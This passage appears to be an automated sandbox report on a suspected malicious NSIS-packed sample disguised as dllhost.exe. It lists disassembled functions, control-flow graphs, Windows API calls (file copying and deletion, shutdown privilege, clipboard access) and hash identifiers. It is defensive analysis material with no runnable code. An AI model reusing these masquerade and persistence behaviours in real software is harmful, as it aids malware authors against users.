40389d 4020->4022 4021->4021 4021->4022 4022->3948 4763 40483d 4764 40484c 4763->4764 4794 4049eb 4764->4794 4796 405892 GetDlgItemTextW 4764->4796 4766 404248 8 API calls 4768 4049ff 4766->4768 4767 40486c 4769 405c25 18 API calls 4767->4769 4770 404872 4769->4770 4797 40624c lstrcpynW 4770->4797 4772 404889 4773 406626 5 API calls 4772->4773 4778 404890 4773->4778 4774 4048d1 4798 40624c lstrcpynW 4774->4798 4776 4048d8 4777 405bc8 4 API calls 4776->4777 4779 4048de GetDiskFreeSpaceW 4777->4779 4778->4774 4782 405b69 2 API calls 4778->4782 4783 404929 4778->4783 4781 404902 MulDiv 4779->4781 4779->4783 4781->4783 4782->4778 4784 40499a 4783->4784 4785 404b35 21 API calls 4783->4785 4786 4049bd 4784->4786 4788 40140b 2 API calls 4784->4788 4787 404987 4785->4787 4799 404203 KiUserCallbackDispatcher 4786->4799 4789 40499c SetDlgItemTextW 4787->4789 4790 40498c 4787->4790 4788->4786 4789->4784 4792 404a6c 21 API calls 4790->4792 4792->4784 4793 4049d9 4793->4794 4795 404609 SendMessageW 4793->4795 4794->4766 4795->4794 4796->4767 4797->4772 4798->4776 4799->4793

                                                                              Executed Functions

                                                                              Function 0040333D Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412stringfilecomCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 40333d-40337a SetErrorMode GetVersion 1 40337c-403384 call 406626 0->1 2 40338d 0->2 1->2 8 403386 1->8 3 403392-4033a6 call 4065b6 lstrlenA 2->3 9 4033a8-4033c4 call 406626 * 3 3->9 8->2 16 4033d5-403436 #17 OleInitialize SHGetFileInfoW call 40624c GetCommandLineW call 40624c GetModuleHandleW 9->16 17 4033c6-4033cc 9->17 24 403440-40345a call 405b4a CharNextW 16->24 25 403438-40343f 16->25 17->16 22 4033ce 17->22 22->16 28 403460-403466 24->28 29 403571-40358b GetTempPathW call 40330c 24->29 25->24 31 403468-40346d 28->31 32 40346f-403473 28->32 36 4035e3-4035fd DeleteFileW call 402ec1 29->36 37 40358d-4035ab GetWindowsDirectoryW lstrcatW call 40330c 29->37 31->31 31->32 34 403475-403479 32->34 35 40347a-40347e 32->35 34->35 38 403484-40348a 35->38 39 40353d-40354a call 405b4a 35->39 57 403603-403609 36->57 58 4036ae-4036be call 403880 OleUninitialize 36->58 37->36 54 4035ad-4035dd GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40330c 37->54 43 4034a5-4034de 38->43 44 40348c-403494 38->44 55 40354c-40354d 39->55 56 40354e-403554 39->56 47 4034e0-4034e5 43->47 48 4034fb-403535 43->48 45 403496-403499 44->45 46 40349b 44->46 45->43 45->46 46->43 47->48 52 4034e7-4034ef 47->52 48->39 53 403537-40353b 48->53 60 4034f1-4034f4 52->60 61 4034f6 52->61 53->39 62 40355c-40356a call 40624c 53->62 54->36 54->58 55->56 56->28 64 40355a 56->64 65 40369e-4036a5 call 40395a 57->65 66 40360f-40361a call 405b4a 57->66 75 4037e4-4037ea 58->75 76 4036c4-4036d4 call 4058ae ExitProcess 58->76 60->48 60->61 61->48 72 40356f 62->72 64->72 74 4036aa 65->74 77 403668-403672 66->77 78 40361c-403651 66->78 72->29 74->58 80 403868-403870 75->80 81 4037ec-403802 GetCurrentProcess OpenProcessToken 75->81 85 403674-403682 call 405c25 77->85 86 4036da-4036ee call 405819 lstrcatW 77->86 82 403653-403657 78->82 83 403872 80->83 84 403876-40387a ExitProcess 80->84 88 403804-403832 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 403838-403846 call 406626 81->89 90 403660-403664 82->90 91 403659-40365e 82->91 83->84 85->58 101 403684-40369a call 40624c * 2 85->101 102 4036f0-4036f6 lstrcatW 86->102 103 4036fb-403715 lstrcatW lstrcmpiW 86->103 88->89 99 403854-40385f ExitWindowsEx 89->99 100 403848-403852 89->100 90->82 95 403666 90->95 91->90 91->95 95->77 99->80 104 403861-403863 call 40140b 99->104 100->99 100->104 101->65 102->103 103->58 106 403717-40371a 103->106 104->80 110 403723 call 4057fc 106->110 111 40371c-403721 call 40577f 106->111 116 403728-403736 SetCurrentDirectoryW 110->116 111->116 118 403743-40376c call 40624c 116->118 119 403738-40373e call 40624c 116->119 123 403771-40378d call 40626e DeleteFileW 118->123 119->118 126 4037ce-4037d6 123->126 127 40378f-40379f CopyFileW 123->127 126->123 128 4037d8-4037df call 406012 126->128 127->126 129 4037a1-4037c1 call 406012 call 40626e call 405831 127->129 128->58 129->126 138 4037c3-4037ca CloseHandle 129->138 138->126
                                                                              APIs
                                                                              • SetErrorMode.KERNELBASE ref: 00403360
                                                                              • GetVersion.KERNEL32 ref: 00403366
                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
                                                                              • OleInitialize.OLE32(00000000), ref: 004033DD
                                                                              • SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
                                                                              • GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,?,00000006,00000008,0000000A), ref: 00403421
                                                                              • CharNextW.USER32(00000000), ref: 00403448
                                                                                • Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
                                                                                • Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653
                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403582
                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040359F
                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 004035B3
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035BB
                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
                                                                              • DeleteFileW.KERNEL32(1033,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                              • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
                                                                              • ExitProcess.KERNEL32 ref: 004036D4
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036E7
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 004036F6
                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Roaming\dllhost.exe" ,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
                                                                              • DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
                                                                              • CopyFileW.KERNEL32 ref: 00403797
                                                                              • CloseHandle.KERNEL32(00000000), ref: 004037C4
                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403832
                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
                                                                              • ExitProcess.KERNEL32 ref: 0040387A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\dllhost.exe$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                              • API String ID: 2488574733-3539436381
                                                                              • Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                                              • Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
                                                                              • Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
                                                                              • Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E
                                                                              Function 0040595A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 498 40595a-405980 call 405c25 501 405982-405994 DeleteFileW 498->501 502 405999-4059a0 498->502 503 405b16-405b1a 501->503 504 4059a2-4059a4 502->504 505 4059b3-4059c3 call 40624c 502->505 506 405ac4-405ac9 504->506 507 4059aa-4059ad 504->507 513 4059d2-4059d3 call 405b69 505->513 514 4059c5-4059d0 lstrcatW 505->514 506->503 509 405acb-405ace 506->509 507->505 507->506 511 405ad0-405ad6 509->511 512 405ad8-405ae0 call 40658f 509->512 511->503 512->503 522 405ae2-405af6 call 405b1d call 405912 512->522 515 4059d8-4059dc 513->515 514->515 518 4059e8-4059ee lstrcatW 515->518 519 4059de-4059e6 515->519 521 4059f3-405a0f lstrlenW FindFirstFileW 518->521 519->518 519->521 523 405a15-405a1d 521->523 524 405ab9-405abd 521->524 538 405af8-405afb 522->538 539 405b0e-405b11 call 4052b0 522->539 527 405a3d-405a51 call 40624c 523->527 528 405a1f-405a27 523->528 524->506 526 405abf 524->526 526->506 540 405a53-405a5b 527->540 541 405a68-405a73 call 405912 527->541 530 405a29-405a31 528->530 531 405a9c-405aac FindNextFileW 528->531 530->527 534 405a33-405a3b 530->534 531->523 537 405ab2-405ab3 FindClose 531->537 534->527 534->531 537->524 538->511 544 405afd-405b0c call 4052b0 call 406012 538->544 539->503 540->531 545 405a5d-405a66 call 40595a 540->545 550 405a94-405a97 call 4052b0 541->550 551 405a75-405a78 541->551 544->503 545->531 550->531 554 405a7a-405a8a call 4052b0 call 406012 551->554 555 405a8c-405a92 551->555 554->531 555->531
                                                                              APIs
                                                                              • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405983
                                                                              • lstrcatW.KERNEL32(004256F0,\*.*,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059CB
                                                                              • lstrcatW.KERNEL32(?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059EE
                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 004059F4
                                                                              • FindFirstFileW.KERNELBASE(004256F0,?,?,?,0040A014,?,004256F0,?,?,C:\Users\user\AppData\Local\Temp\,7570D4C4,00000000), ref: 00405A04
                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
                                                                              • FindClose.KERNEL32(00000000), ref: 00405AB3
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
                                                                              • \*.*, xrefs: 004059C5
                                                                              • "C:\Users\user\AppData\Roaming\dllhost.exe" , xrefs: 0040595A
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                              • API String ID: 2035342205-201830484
                                                                              • Opcode ID: a726ba824d0f7a77de256695d031786f567400a106043d2ce3abae66fd9d1b52
                                                                              • Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
                                                                              • Opcode Fuzzy Hash: a726ba824d0f7a77de256695d031786f567400a106043d2ce3abae66fd9d1b52
                                                                              • Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE
                                                                              Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                                              • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                                              • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                                              Function 0040658F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405C6E,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,7570D4C4,0040597A,?,C:\Users\user\AppData\Local\Temp\,7570D4C4), ref: 0040659A
                                                                              • FindClose.KERNELBASE(00000000), ref: 004065A6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID: 8gB
                                                                              • API String ID: 2295610775-1733800166
                                                                              • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
                                                                              • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                              • Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC
                                                                              Function 00402862 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402871
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                                                              • Instruction ID: 457e94eee93b26a2a7a920d72ffedce9eee0ef57ab85e6e0c0e07cda1b0ec514
                                                                              • Opcode Fuzzy Hash: e1c3063bf10c5ef6748f1a2a306b49316e07f1283b06f73373375dfd7fee89f9
                                                                              • Instruction Fuzzy Hash: 72F08271A04104EFD710EBA4DD49AADB378EF00314F2045BBF911F21D1D7B44E409B2A
                                                                              Function 004053EF Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284windowclipboardmemoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 139 4053ef-40540a 140 405410-4054d7 GetDlgItem * 3 call 404216 call 404b4d GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405599-4055a0 139->141 159 4054f5-4054f8 140->159 160 4054d9-4054f3 SendMessageW * 2 140->160 143 4055a2-4055c4 GetDlgItem CreateThread CloseHandle 141->143 144 4055ca-4055d7 141->144 143->144 145 4055f5-4055ff 144->145 146 4055d9-4055df 144->146 150 405601-405607 145->150 151 405655-405659 145->151 148 4055e1-4055f0 ShowWindow * 2 call 404216 146->148 149 40561a-405623 call 404248 146->149 148->145 163 405628-40562c 149->163 155 405609-405615 call 4041ba 150->155 156 40562f-40563f ShowWindow 150->156 151->149 153 40565b-405661 151->153 153->149 161 405663-405676 SendMessageW 153->161 155->149 164 405641-40564a call 4052b0 156->164 165 40564f-405650 call 4041ba 156->165 166 405508-40551f call 4041e1 159->166 167 4054fa-405506 SendMessageW 159->167 160->159 168 405778-40577a 161->168 169 40567c-4056a7 CreatePopupMenu call 40626e AppendMenuW 161->169 164->165 165->151 178 405521-405535 ShowWindow 166->178 179 405555-405576 GetDlgItem SendMessageW 166->179 167->166 168->163 176 4056a9-4056b9 GetWindowRect 169->176 177 4056bc-4056d1 TrackPopupMenu 169->177 176->177 177->168 180 4056d7-4056ee 177->180 181 405544 178->181 182 405537-405542 ShowWindow 178->182 179->168 183 40557c-405594 SendMessageW * 2 179->183 184 4056f3-40570e SendMessageW 180->184 185 40554a-405550 call 404216 181->185 182->185 183->168 184->184 186 405710-405733 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405735-40575c SendMessageW 186->188 188->188 189 40575e-405772 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040544D
                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040545C
                                                                              • GetClientRect.USER32(?,?,00000004), ref: 00405499
                                                                              • GetSystemMetrics.USER32(00000002), ref: 004054A0
                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
                                                                              • ShowWindow.USER32(00000000,?), ref: 00405528
                                                                              • ShowWindow.USER32(?,00000008), ref: 0040553C
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040555D
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040546B
                                                                                • Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224
                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055AF
                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005383,00000000), ref: 004055BD
                                                                              • CloseHandle.KERNELBASE(00000000), ref: 004055C4
                                                                              • ShowWindow.USER32(00000000), ref: 004055E8
                                                                              • ShowWindow.USER32(?,00000008), ref: 004055ED
                                                                              • ShowWindow.USER32(00000008), ref: 00405637
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
                                                                              • CreatePopupMenu.USER32 ref: 0040567C
                                                                              • AppendMenuW.USER32 ref: 00405690
                                                                              • GetWindowRect.USER32(?,?), ref: 004056B0
                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
                                                                              • OpenClipboard.USER32(00000000), ref: 00405711
                                                                              • EmptyClipboard.USER32 ref: 00405717
                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040572D
                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405761
                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
